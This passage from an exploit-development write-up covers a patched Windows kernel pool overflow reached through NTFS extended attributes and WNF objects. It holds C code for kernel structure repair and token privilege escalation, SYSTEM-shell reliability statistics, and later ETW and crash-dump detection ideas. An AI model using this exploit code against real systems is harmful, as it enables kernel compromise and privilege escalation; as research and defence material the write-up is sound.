Although we could restore this using the WNF relative read/write, since we now have arbitrary read and write via the APIs, we can instead implement a function which uses a previously saved ScopeInstance pointer to search for the StateName of our targeted _WNF_NAME_INSTANCE object and recover its address.

Visually this looks as follows:

Some example code for this is:

/**
* This function returns back the address of a _WNF_NAME_INSTANCE looked up by its internal StateName
* It performs an _RTL_AVL_TREE tree walk against the sorted tree of _WNF_NAME_INSTANCES. 
* The tree root is at _WNF_SCOPE_INSTANCE+0x38 (NameSet)
**/
QWORD* FindStateName(unsigned __int64 StateName)
{
    QWORD* i;
    
    // _WNF_SCOPE_INSTANCE+0x38 (NameSet)
    for (i = (QWORD*)read64((char*)BackupScopeInstance+0x38); ; i = (QWORD*)read64((char*)i + 0x8))
    {

        while (1)
        {
            if (!i)
                return 0;

            // StateName is 0x18 after the TreeLinks FLINK
            QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

            if (StateName >= CurrStateName)
                break;

            i = (QWORD*)read64(i);
        }
        QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

        if (StateName <= CurrStateName)
            break; 
    }
    return (QWORD*)((QWORD*)i - 2);
}

Once we have obtained our _WNF_NAME_INSTANCE, we can restore the original StateData pointer.
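
With the helper above, the restoration itself is a single write at offset 0x58 (the StateData member in the structure layout shown earlier); OriginalStateData is assumed to have been saved before the initial overwrite:

// Locate our corrupted _WNF_NAME_INSTANCE by StateName and put the
// original StateData pointer back before process exit.
QWORD* instance = FindStateName(TargetStateName);
write64((char*)instance + 0x58, OriginalStateData);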

RunRef Restoration

The next crash encountered was related to the fact that we may have corrupted the RunRef member of many _WNF_NAME_INSTANCEs in the process of obtaining our unbounded _WNF_STATE_DATA. When ExReleaseRundownProtection is called with an invalid value present, we will crash as follows:

1: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffffeb0f`0e9e5bf8 fffff805`2f512082 : ffffeb0f`0e9e5d60 fffff805`2f37b1d0 00000000`00000000 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffeb0f`0e9e5c00 fffff805`2f511666 : 00000000`00000003 ffffeb0f`0e9e5d60 fffff805`2f408e90 00000000`0000003b : nt!KiBugCheckDebugBreak+0x12
02 ffffeb0f`0e9e5c60 fffff805`2f3f3fa7 : 00000000`00000103 00000000`00000000 fffff805`2f0e3838 ffffc807`cdb5e5e8 : nt!KeBugCheck2+0x946
03 ffffeb0f`0e9e6370 fffff805`2f405e69 : 00000000`0000003b 00000000`c0000005 fffff805`2f242c32 ffffeb0f`0e9e6cb0 : nt!KeBugCheckEx+0x107
04 ffffeb0f`0e9e63b0 fffff805`2f4052bc : ffffeb0f`0e9e7478 fffff805`2f0e3838 ffffeb0f`0e9e65a0 00000000`00000000 : nt!KiBugCheckDispatch+0x69
05 ffffeb0f`0e9e64f0 fffff805`2f3fcd5f : fffff805`2f405240 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceHandler+0x7c
06 ffffeb0f`0e9e6530 fffff805`2f285027 : ffffeb0f`0e9e6aa0 00000000`00000000 ffffeb0f`0e9e7b00 fffff805`2f40595f : nt!RtlpExecuteHandlerForException+0xf
07 ffffeb0f`0e9e6560 fffff805`2f283ce6 : ffffeb0f`0e9e7478 ffffeb0f`0e9e71b0 ffffeb0f`0e9e7478 ffffa300`da5eb5d8 : nt!RtlDispatchException+0x297
08 ffffeb0f`0e9e6c80 fffff805`2f405fac : ffff521f`0e9e8ad8 ffffeb0f`0e9e7560 00000000`00000000 00000000`00000000 : nt!KiDispatchException+0x186
09 ffffeb0f`0e9e7340 fffff805`2f401ce0 : 00000000`00000000 00000000`00000000 ffffffff`ffffffff ffffa300`daf84000 : nt!KiExceptionDispatch+0x12c
0a ffffeb0f`0e9e7520 fffff805`2f242c32 : ffffc807`ce062a50 fffff805`2f2df0dd ffffc807`ce062400 ffffa300`da5eb5d8 : nt!KiGeneralProtectionFault+0x320 (TrapFrame @ ffffeb0f`0e9e7520)
0b ffffeb0f`0e9e76b0 fffff805`2f2e8664 : 00000000`00000006 ffffa300`d449d8a0 ffffa300`da5eb5d8 ffffa300`db013360 : nt!ExfReleaseRundownProtection+0x32
0c ffffeb0f`0e9e76e0 fffff805`2f658318 : ffffffff`00000000 ffffa300`00000000 ffffc807`ce062a50 ffffa300`00000000 : nt!ExReleaseRundownProtection+0x24
0d ffffeb0f`0e9e7710 fffff805`2f846003 : ffffffff`ffffffff ffffa300`db013360 ffffa300`da5eb5a0 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1dc
0e ffffeb0f`0e9e7760 fffff805`2f70553e : 00000000`00000000 ffffeb0f`0e9e7990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0f ffffeb0f`0e9e77a0 fffff805`2f69ea7f : ffffc807`ce0700c0 ffffa300`d2c506a0 ffffeb0f`0e9e7990 00000000`00000000 : nt!ExWnfExitProcess+0x32
10 ffffeb0f`0e9e77d0 fffff805`2f5f4558 : 00000000`c000013a 00000000`00000001 ffffeb0f`0e9e79e0 000000f1`f98db000 : nt!PspExitThread+0x5eb
11 ffffeb0f`0e9e78d0 fffff805`2f2e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff805`2f2f0ee6 : nt!KiSchedulerApcTerminate+0x38
12 ffffeb0f`0e9e7910 fffff805`2f3f8440 : 00000000`00000000 ffffeb0f`0e9e79c0 ffffeb0f`0e9e7b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
13 ffffeb0f`0e9e79c0 fffff805`2f40595f : ffffc807`ce062400 0000020b`04f64b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
14 ffffeb0f`0e9e7b00 00007ff9`8314be44 : 00007ff9`80aa26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffeb0f`0e9e7b00)
15 000000f1`f973f678 00007ff9`80aa26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`830fa800 : ntdll!NtWaitForSingleObject+0x14
16 000000f1`f973f680 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`830fa800 00000000`00000000 : 0x00007ff9`80aa26ee

To restore these correctly we need to think about how these objects fit together in memory and how to obtain a full list of all _WNF_NAME_INSTANCES which could possibly be corrupt.

Within _EPROCESS we have a member WnfContext which is a pointer to a _WNF_PROCESS_CONTEXT.

This looks as follows:

nt!_WNF_PROCESS_CONTEXT
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 Process          : Ptr64 _EPROCESS
   +0x010 WnfProcessesListEntry : _LIST_ENTRY
   +0x020 ImplicitScopeInstances : [3] Ptr64 Void
   +0x038 TemporaryNamesListLock : _WNF_LOCK
   +0x040 TemporaryNamesListHead : _LIST_ENTRY
   +0x050 ProcessSubscriptionListLock : _WNF_LOCK
   +0x058 ProcessSubscriptionListHead : _LIST_ENTRY
   +0x068 DeliveryPendingListLock : _WNF_LOCK
   +0x070 DeliveryPendingListHead : _LIST_ENTRY
   +0x080 NotificationEvent : Ptr64 _KEVENT

As you can see, there is a member TemporaryNamesListHead which heads a linked list of the TemporaryNameListEntry members within each _WNF_NAME_INSTANCE.

Therefore, we can calculate the address of each of the _WNF_NAME_INSTANCES by iterating through the linked list using our arbitrary read primitives.

We can then determine if the Header or RunRef has been corrupted and restore to a sane value which does not cause a BSOD (i.e. 0).

An example of this is:

/**
* This function starts from the EPROCESS WnfContext which points at a _WNF_PROCESS_CONTEXT
* The _WNF_PROCESS_CONTEXT contains a TemporaryNamesListHead at 0x40 offset. 
* This linked list is then traversed to locate all _WNF_NAME_INSTANCES and the header and RunRef fixed up.
**/
void FindCorruptedRunRefs(LPVOID wnf_process_context_ptr)
{
    // +0x040 TemporaryNamesListHead : _LIST_ENTRY - this is the list head
    // itself, living inside the _WNF_PROCESS_CONTEXT, and must not be
    // treated as a name instance.
    LPVOID head = (char*)wnf_process_context_ptr + 0x40;
    LPVOID ptr;

    // Follow the Flink chain using the arbitrary read primitive until we
    // wrap back around to the list head.
    for (ptr = read64(head); ptr != head; ptr = read64(ptr))
    {
        // +0x088 TemporaryNameListEntry : _LIST_ENTRY - subtract 17 QWORDs
        // (0x88 bytes) to get from the list entry back to the base of the
        // containing _WNF_NAME_INSTANCE.
        QWORD* nameinstance = (QWORD*)ptr - 17;

        QWORD header = (QWORD)read64(nameinstance);

        if (header != 0x0000000000A80903)
        {
            // Fix the header up (expected NodeTypeCode/NodeByteSize).
            write64(nameinstance, 0x0000000000A80903);
            // Fix the RunRef up.
            write64((char*)nameinstance + 0x8, 0);
        }
    }
}

NTOSKRNL Base Address

Whilst this isn’t actually needed by the exploit, I needed to obtain the NTOSKRNL base address to speed up some examination and debugging of the segment heap. With access to the EPROCESS/KPROCESS or ETHREAD/KTHREAD, the NTOSKRNL base address can be obtained from the kernel stack. By putting a newly created thread into a wait state, we can walk the kernel stack for that thread and obtain the return address of a known function. Using this and a fixed offset we can then calculate the NTOSKRNL base address; a hedged sketch follows the stack dump below. A similar technique was used within KernelForge.

The following output shows the thread whilst in the wait state:

0: kd> !thread ffffbc037834b080
THREAD ffffbc037834b080  Cid 1ed8.1f54  Teb: 000000537ff92000 Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
    ffffbc037d7f7a60  SynchronizationEvent
Not impersonating
DeviceMap                 ffff988cca61adf0
Owning Process            ffffbc037d8a4340       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      3234           Ticks: 542 (0:00:00:08.468)
Context Switch Count      4              IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.000
Win32 Start Address 0x00007ff6e77b1710
Stack Init ffffd288fe699c90 Current ffffd288fe6996a0
Base ffffd288fe69a000 Limit ffffd288fe694000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd288`fe6996e0 fffff804`818e4540 : fffff804`7d17d180 00000000`ffffffff ffffd288`fe699860 ffffd288`fe699a20 : nt!KiSwapContext+0x76
ffffd288`fe699820 fffff804`818e3a6f : 00000000`00000000 00000000`00000001 ffffd288`fe6999e0 00000000`00000000 : nt!KiSwapThread+0x500
ffffd288`fe6998d0 fffff804`818e3313 : 00000000`00000000 fffff804`00000000 ffffbc03`7c41d500 ffffbc03`7834b1c0 : nt!KiCommitThreadWait+0x14f
ffffd288`fe699970 fffff804`81cd6261 : ffffbc03`7d7f7a60 00000000`00000006 00000000`00000001 00000000`00000000 : nt!KeWaitForSingleObject+0x233
ffffd288`fe699a60 fffff804`81cd630a : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ObWaitForSingleObject+0x91
ffffd288`fe699ac0 fffff804`81a058b5 : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtWaitForSingleObject+0x6a
ffffd288`fe699b00 00007ffc`c0babe44 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd288`fe699b00)
00000053`003ffc68 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtWaitForSingleObject+0x14
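
As a rough illustration, the following is a minimal sketch of this stack walk, reusing the read64() primitive from earlier. The _KTHREAD offsets and the RVA of the known return address are version-specific placeholders (assumptions for a given build), not universal constants, and the matching heuristic is deliberately crude:

```
// Hedged sketch: recover the NTOSKRNL base from a waiting thread's kernel
// stack. All offsets/RVAs below are assumptions that must be rebuilt per
// target build.
#define KTHREAD_STACKBASE_OFFSET   0x38     // assumed: _KTHREAD.StackBase
#define KTHREAD_KERNELSTACK_OFFSET 0x58     // assumed: _KTHREAD.KernelStack
#define KNOWN_RETADDR_RVA          0x4058da // assumed RVA of a known return
                                            // address (e.g. into
                                            // nt!KiSystemServiceCopyEnd)

QWORD FindNtoskrnlBase(LPVOID kthread)
{
    QWORD stackBase   = (QWORD)read64((char*)kthread + KTHREAD_STACKBASE_OFFSET);
    QWORD kernelStack = (QWORD)read64((char*)kthread + KTHREAD_KERNELSTACK_OFFSET);

    // The stack grows downwards, so the waiting thread's saved frames sit
    // between the saved kernel stack pointer and the stack base.
    for (QWORD p = kernelStack; p < stackBase; p += 8)
    {
        QWORD val = (QWORD)read64((LPVOID)p);

        // Crude heuristic: a canonical kernel-mode pointer whose low 12 bits
        // match those of the known return address is taken to be our saved
        // return address; subtracting the RVA then yields the image base.
        if (val >= 0xfffff80000000000ULL &&
            (val & 0xfff) == (KNOWN_RETADDR_RVA & 0xfff))
            return val - KNOWN_RETADDR_RVA;
    }
    return 0;
}
```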

Exploit Testing and Statistics

As there are some non-deterministic elements to this exploit and some potential for instability, an exploit testing framework was developed to determine its effectiveness across multiple runs, on multiple supported platforms, and with varying exploit parameters. Whilst this lab environment is not fully representative of a long-running operating system with third party drivers installed and a noisier kernel pool, it gives some indication that the approach is feasible and also feeds into possible detection mechanisms.

The key variables which can be modified with this exploit are:

  • Spray size
  • Post-exploitation choices

All these are measured over 100 iterations of the exploit (over 5 runs), with a timeout duration of 15 seconds (i.e. an execution was considered stable if a BSOD did not occur within 15 seconds of running the exploit). A rough sketch of such a harness loop is shown after the metric definitions below.

SYSTEM shells – Number of times a SYSTEM shell was launched.

Total LFH Writes – For all 100 runs of the exploit, how many corruptions were triggered.

Avg LFH Writes – Average number of LFH overflows needed to obtain a SYSTEM shell.

Failed after 32 – How many times the exploit failed to overflow an adjacent object of the required target type, by reaching the max number of overflow attempts. 32 was chosen as a semi-arbitrary value based on empirical testing and on the fact that the blocks in the BlockBitmap for the LFH are scanned in groups of 32 blocks.

BSODs on exec – Number of times the exploit BSODed the box on execution.

Unmapped Read – Number of times the relative read reached unmapped memory (ExpWnfReadStateData) – included in the BSODs on exec count above.
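
The following is a hypothetical sketch of the measurement loop behind these statistics. The helpers revert_vm_snapshot() and run_exploit_with_timeout() stand in for the real orchestration (reverting a test VM and launching the exploit over a control channel with the 15 second timeout) and are stubbed out here so the sketch is self-contained:

```
#include <stdio.h>

#define ITERATIONS   100
#define TIMEOUT_SECS 15

typedef enum { SHELL, FAILED_AFTER_32, BSOD_ON_EXEC } result_t;

static void revert_vm_snapshot(void) { /* stub: revert the test VM */ }

static result_t run_exploit_with_timeout(int secs, int* lfh_writes)
{
    // Stub: the real implementation reports how many LFH overflows were
    // triggered and whether a shell, a bailout after 32 attempts, or a
    // BSOD (no response within the timeout) occurred.
    (void)secs;
    *lfh_writes = 8;
    return SHELL;
}

int main(void)
{
    int shells = 0, bsods = 0, failed32 = 0, total_writes = 0;

    for (int i = 0; i < ITERATIONS; i++)
    {
        int writes = 0;
        revert_vm_snapshot();
        switch (run_exploit_with_timeout(TIMEOUT_SECS, &writes))
        {
        case SHELL:           shells++;   break;
        case FAILED_AFTER_32: failed32++; break;
        case BSOD_ON_EXEC:    bsods++;    break;
        }
        total_writes += writes;
    }

    printf("SYSTEM shells: %d, failed after 32: %d, BSODs on exec: %d\n",
           shells, failed32, bsods);
    printf("Total LFH writes: %d, avg per shell: %d\n",
           total_writes, shells ? total_writes / shells : 0);
    return 0;
}
```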

Spray Size Variation

The following statistics show runs when varying the spray size.

Spray size 3000

| Result           | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg |
|------------------|-------|-------|-------|-------|-------|-----|
| SYSTEM shells    | 85    | 82    | 76    | 75    | 75    | 78  |
| Total LFH writes | 708   | 726   | 707   | 678   | 624   | 688 |
| Avg LFH writes   | 8     | 8     | 9     | 9     | 8     | 8   |
| Failed after 32  | 1     | 3     | 2     | 1     | 1     | 2   |
| BSODs on exec    | 14    | 15    | 22    | 24    | 24    | 20  |
| Unmapped Read    | 4     | 5     | 8     | 6     | 10    | 7   |

Spray size 6000

| Result           | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg |
|------------------|-------|-------|-------|-------|-------|-----|
| SYSTEM shells    | 84    | 80    | 78    | 84    | 79    | 81  |
| Total LFH writes | 674   | 643   | 696   | 762   | 706   | 696 |
| Avg LFH writes   | 8     | 8     | 9     | 9     | 8     | 8   |
| Failed after 32  | 2     | 4     | 3     | 3     | 4     | 3   |
| BSODs on exec    | 14    | 16    | 19    | 13    | 17    | 16  |
| Unmapped Read    | 2     | 4     | 4     | 5     | 4     | 4   |

Spray size 10000

| Result           | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg |
|------------------|-------|-------|-------|-------|-------|-----|
| SYSTEM shells    | 84    | 85    | 87    | 85    | 86    | 85  |
| Total LFH writes | 805   | 714   | 761   | 688   | 694   | 732 |
| Avg LFH writes   | 9     | 8     | 8     | 8     | 8     | 8   |
| Failed after 32  | 3     | 5     | 3     | 3     | 3     | 3   |
| BSODs on exec    | 13    | 10    | 10    | 12    | 11    | 11  |
| Unmapped Read    | 1     | 0     | 1     | 1     | 0     | 1   |

Spray size 20000

| Result           | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg |
|------------------|-------|-------|-------|-------|-------|-----|
| SYSTEM shells    | 89    | 90    | 94    | 90    | 90    | 91  |
| Total LFH writes | 624   | 763   | 657   | 762   | 650   | 691 |
| Avg LFH writes   | 7     | 8     | 7     | 8     | 7     | 7   |
| Failed after 32  | 3     | 2     | 1     | 2     | 2     | 2   |
| BSODs on exec    | 8     | 8     | 5     | 8     | 8     | 7   |
| Unmapped Read    | 0     | 0     | 0     | 0     | 1     | 0   |

From this we can see that increasing the spray size leads to a much decreased chance of hitting an unmapped read (due to a page not being mapped) and thus reduces the number of BSODs.

On average, the number of overflows needed to obtain the correct memory layout stayed roughly the same regardless of spray size.

Post Exploitation Method Variation

I also experimented with the post exploitation method used (token stealing vs modifying the existing token). The reason for this is that the token stealing method involves more kernel reads/writes and therefore a longer window before PreviousMode can be reverted.
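
For reference, the following is a hedged sketch of the token modification path, reusing the read64/write64 primitives from earlier. The _EPROCESS.Token offset and the "all privileges" bitmask are version-specific assumptions that would need rebuilding per target build:

```
#define EPROCESS_TOKEN_OFFSET 0x4b8  // assumed: _EPROCESS.Token (_EX_FAST_REF)
#define TOKEN_PRIVS_OFFSET    0x40   // assumed: _TOKEN.Privileges

void EnableAllTokenPrivileges(LPVOID eprocess)
{
    // _EX_FAST_REF packs a reference count into the low 4 bits - mask it
    // off to recover the _TOKEN pointer.
    QWORD token = (QWORD)read64((char*)eprocess + EPROCESS_TOKEN_OFFSET) & ~0xfULL;

    // _SEP_TOKEN_PRIVILEGES is { Present, Enabled, EnabledByDefault }.
    // Writing a full mask to Present and Enabled grants every privilege
    // (0x1ff2ffffbc is an assumed "all privileges" bitmask).
    QWORD all = 0x0000001ff2ffffbcULL;
    write64((LPVOID)(token + TOKEN_PRIVS_OFFSET), all);      // Present
    write64((LPVOID)(token + TOKEN_PRIVS_OFFSET + 8), all);  // Enabled
}
```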

Spray size 20000

With all the _SEP_TOKEN_PRIVILEGES enabled:

| Result           | Run 1 | Run 2 | Run 3 | Run 4 | Run 5 | Avg |
|------------------|-------|-------|-------|-------|-------|-----|
| PRIV shells      | 94    | 92    | 93    | 92    | 89    | 92  |
| Total LFH writes | 939   | 825   | 825   | 788   | 724   | 820 |
| Avg LFH writes   | 9     | 8     | 8     | 8     | 8     | 8   |
| Failed after 32  | 2     | 2     | 1     | 2     | 0     | 1   |
| BSODs on exec    | 4     | 6     | 6     | 6     | 11    | 6   |
| Unmapped Read    | 0     | 1     | 1     | 2     | 2     | 1   |

Therefore, there is only a negligible difference between these two methods.

Detection

After all of this is there anything we have learned which could help defenders?

Well, firstly, a patch for this vulnerability has been available since the 8th of June 2021. If you’re reading this and the patch is not applied, then there are obviously bigger problems with the patch management lifecycle to focus on 🙂

However, there are some engineering insights which can be gained from this exercise, and from detecting memory corruption exploits in the wild in general. I will focus specifically on the vulnerability itself and this exploit, rather than the more generic detection of post exploitation techniques (token stealing etc.), which has been covered in many online articles. As I never had access to the in-the-wild exploit, these detection mechanisms may not be useful for that scenario. Regardless, this research should give security researchers a greater understanding of this area.

The main artifacts from this exploit are:

  • NTFS Extended Attributes being created and queried.
  • WNF objects being created (as part of the spray).
  • Failed exploit attempts leading to BSODs.

NTFS Extended Attributes

Firstly, examining the ETW framework for Windows, the provider Microsoft-Windows-Kernel-File was found to expose "SetEa" and "QueryEa" events.

This can be captured as part of an ETW trace.
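
The following is a hedged sketch of starting such a real-time trace programmatically. The provider GUID is assumed from the Microsoft-Windows-Kernel-File manifest, and the catch-all keyword mask would want narrowing to just the Ea-related keywords in practice:

```
#include <windows.h>
#include <evntrace.h>
#include <stdio.h>
#include <stdlib.h>

static const GUID KernelFileGuid = // assumed: Microsoft-Windows-Kernel-File
    { 0xedd08927, 0x9cc4, 0x4e65, { 0xb9, 0x70, 0xc2, 0x56, 0x0f, 0xb5, 0xc2, 0x89 } };

int main(void)
{
    static const WCHAR name[] = L"KernelFileEaTrace";
    ULONG size = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(name);
    EVENT_TRACE_PROPERTIES* props = (EVENT_TRACE_PROPERTIES*)calloc(1, size);

    props->Wnode.BufferSize = size;
    props->Wnode.Flags = WNODE_FLAG_TRACED_GUID;
    props->Wnode.ClientContext = 1;                   // QPC timestamps
    props->LogFileMode = EVENT_TRACE_REAL_TIME_MODE;  // no .etl file needed
    props->LoggerNameOffset = sizeof(EVENT_TRACE_PROPERTIES);

    TRACEHANDLE session = 0;
    if (StartTraceW(&session, name, props) != ERROR_SUCCESS)
        return 1;

    // Enable the provider with an all-keywords mask at informational level.
    EnableTraceEx2(session, &KernelFileGuid, EVENT_CONTROL_CODE_ENABLE_PROVIDER,
                   TRACE_LEVEL_INFORMATION, ~0ULL, 0, 0, NULL);

    printf("Tracing - press enter to stop...\n");
    getchar();

    ControlTraceW(session, name, props, EVENT_TRACE_CONTROL_STOP);
    free(props);
    return 0;
}
```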

As this vulnerability can be exploited at low integrity (and thus from a sandbox), the detection approach would vary based on whether an attacker had local code execution or had chained it together with a browser exploit.

One idea for endpoint detection and response (EDR) based detection would be that a browser renderer process performing both of these actions (in the case of using this exploit to break out of a browser sandbox) would warrant deeper investigation. For example, whilst loading a new tab and web page, the browser process "MicrosoftEdge.exe" triggers these events legitimately under normal operation, whereas the sandboxed renderer process "MicrosoftEdgeCP.exe" does not. Chrome did not trigger either of the events when loading a new tab and web page either. I didn’t explore too deeply whether there are any renderer operations which could trigger this non-maliciously, but this provides a place where defenders can explore further.
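
A minimal consumer-side sketch of this idea follows, attached to the trace session from the earlier sketch. The event IDs for SetEa/QueryEa are placeholders (assumptions) that should be taken from the provider manifest, and a real EDR would resolve the PID to an image path and check it against a list of sandboxed processes rather than just printing it:

```
#include <windows.h>
#include <evntrace.h>
#include <evntcons.h>
#include <stdio.h>

#define EVENT_ID_SET_EA   0x13  // assumed - take from the provider manifest
#define EVENT_ID_QUERY_EA 0x14  // assumed - take from the provider manifest

static VOID WINAPI OnEvent(PEVENT_RECORD rec)
{
    USHORT id = rec->EventHeader.EventDescriptor.Id;
    if (id != EVENT_ID_SET_EA && id != EVENT_ID_QUERY_EA)
        return;

    // Flag EA operations; a renderer process appearing here is suspicious.
    printf("EA operation (event %u) from pid %lu\n",
           id, rec->EventHeader.ProcessId);
}

int main(void)
{
    EVENT_TRACE_LOGFILEW log = { 0 };
    log.LoggerName = (LPWSTR)L"KernelFileEaTrace"; // session from the sketch above
    log.ProcessTraceMode = PROCESS_TRACE_MODE_EVENT_RECORD |
                           PROCESS_TRACE_MODE_REAL_TIME;
    log.EventRecordCallback = OnEvent;

    TRACEHANDLE h = OpenTraceW(&log);
    if (h == INVALID_PROCESSTRACE_HANDLE)
        return 1;
    ProcessTrace(&h, 1, NULL, NULL); // blocks, dispatching events to OnEvent
    CloseTrace(h);
    return 0;
}
```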

WNF Operations

The second area investigated was to determine if there were any ETW events produced by WNF based operations. Looking through the "Microsoft-Windows-Kernel-*" providers, I could not find any related events which would help in this area. Therefore, detecting the spray through ETW logging of WNF operations did not seem feasible. This was expected, as the WNF subsystem is not intended for use by non-MS code.

Crash Dump Telemetry

Crash dumps are a very good way to detect unreliable exploitation techniques, or cases where an exploit developer has inadvertently left their development system connected to a network. MS08-067 is a well known example of Microsoft using this to identify an 0day from their WER telemetry; that one was found by looking for shellcode, but certain crashes are pretty suspicious in their own right when coming from production releases. Apple also seem to have added telemetry to iMessage for suspicious crashes.

In the case of this specific vulnerability being exploited via WNF, there is a slim chance (approx. <5%) that the following BSOD can occur, which could act as a detection artefact:

```
Child-SP          RetAddr           Call Site
ffff880f`6b3b7d18 fffff802`1e112082 nt!DbgBreakPointWithStatus
ffff880f`6b3b7d20 fffff802`1e111666 nt!KiBugCheckDebugBreak+0x12
ffff880f`6b3b7d80 fffff802`1dff3fa7 nt!KeBugCheck2+0x946
ffff880f`6b3b8490 fffff802`1e0869d9 nt!KeBugCheckEx+0x107
ffff880f`6b3b84d0 fffff802`1deeeb80 nt!MiSystemFault+0x13fda9
ffff880f`6b3b85d0 fffff802`1e00205e nt!MmAccessFault+0x400
ffff880f`6b3b8770 fffff802`1e006ec0 nt!KiPageFault+0x35e
ffff880f`6b3b8908 fffff802`1e218528 nt!memcpy+0x100
ffff880f`6b3b8910 fffff802`1e217a97 nt!ExpWnfReadStateData+0xa4
ffff880f`6b3b8980 fffff802`1e0058b5 nt!NtQueryWnfStateData+0x2d7
ffff880f`6b3b8a90 00007ffe`e828ea14 nt!KiSystemServiceCopyEnd+0x25
00000082`054ff968 00007ff6`e0322948 0x00007ffe`e828ea14
00000082`054ff970 0000019a`d26b2190 0x00007ff6`e0322948
00000082`054ff978 00000082`054fe94e 0x0000019a`d26b2190
00000082`054ff980 00000000`00000095 0x00000082`054fe94e
00000082`054ff988 00000000`000000a0 0x95
00000082`054ff990 0000019a`d26b71e0 0xa0
00000082`054ff998 00000082`054ff9b4 0x0000019a`d26b71e0
00000082`054ff9a0 00000000`00000000 0x00000082`054ff9b4
```

Under normal operation you would not expect a memcpy operation to fault accessing unmapped memory when triggered by the WNF subsystem. Whilst this telemetry might lead to attack attempts being discovered prior to an attacker obtaining code execution, once kernel code execution or SYSTEM has been gained, an attacker may simply disable the telemetry or sanitise it afterwards – especially in cases where there could be system instability post exploitation. Windows 11 looks to have added additional ETW logging with these policy settings to determine scenarios where this is modified:

Windows 11 ETW events.

Conclusion

This article demonstrates some of the further lengths an exploit developer needs to go to achieve more reliable and stable code execution beyond a simple POC.

At this point we have an exploit which is much more successful and less likely to cause instability on the target system than a simple POC. However, we can only achieve around a 90% success rate due to the techniques used; this seems to be about the limit with this approach and without using alternative exploit primitives. The article also gives some examples of potential ways to identify exploitation of this vulnerability and to detect memory corruption exploits in general.

Acknowledgements

Boris Larin, for discovering this 0day being exploited in the wild and for the initial write-up.

Yan ZiShuang, for performing parallel research into exploitation of this vuln and blogging about it.

Alex Ionescu and Gabrielle Viala for the initial documentation of WNF.

Corentin Bayet, Paul Fariello, Yarden Shafir, Angelboy, Mark Yason for publishing their research into the Windows 10 Segment Pool/Heap.

Aaron Adams and Cedric Halbronn for doing multiple QA’s and discussions around this research.
